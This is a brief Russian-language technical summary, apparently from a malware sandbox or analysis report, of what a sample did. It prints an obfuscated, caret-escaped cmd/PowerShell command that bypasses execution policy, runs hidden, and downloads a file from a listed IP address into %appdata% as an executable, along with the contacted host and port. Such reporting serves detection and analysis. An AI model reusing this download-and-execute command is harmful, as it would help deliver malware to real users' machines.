Техническая информация
- http://46.30.46.70/s.jpe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWe^RShe^l^l^.eXe -E^X^eCU^tIo^NPoLiCy ByPA^S^s ^-^NO^prOfi^l^e -wiN^DO^WS^tY^Le H^i^DDEn^ (neW-oBJeC^T^ Sys^teM.Ne^t.^wEb^cLIEN^T^).Do^W^NlOad^FIle(^'http://46.30.46.70/s...
- '46.#0.46.70':80
- '<SYSTEM32>\cmd.exe' /c "P^oWe^RShe^l^l^.eXe -E^X^eCU^tIo^NPoLiCy ByPA^S^s ^-^NO^prOfi^l^e -wiN^DO^WS^tY^Le H^i^DDEn^ (neW-oBJeC^T^ Sys^teM.Ne^t.^wEb^cLIEN^T^).Do^W^NlOad^FIle(^'http://46.30.46.70/s...' (со скрытым окном)